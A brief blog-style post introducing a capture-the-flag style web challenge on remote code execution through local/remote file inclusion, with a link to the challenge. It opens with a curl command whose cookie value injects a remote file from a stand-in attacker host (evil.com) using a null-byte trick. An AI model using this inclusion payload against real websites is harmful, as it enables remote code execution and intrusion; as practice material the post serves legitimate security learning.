Worpress:~ TheZakMan$: curl http://localhost.com/pg.php -b “pref_file=http://evil.com/Day3.txt%00″
Today I stumbled into something old but gold Zixem’s challenges page.
For some of you that never done it here is a easy and quick challange based on Remote Code Execution (RCE) exploiting the LFI/RFI vulnerability.
http://zixem.altervista.org/level1.php
The hint is pretty clear, you are looking AT it.
TheZakMan-Box:~ 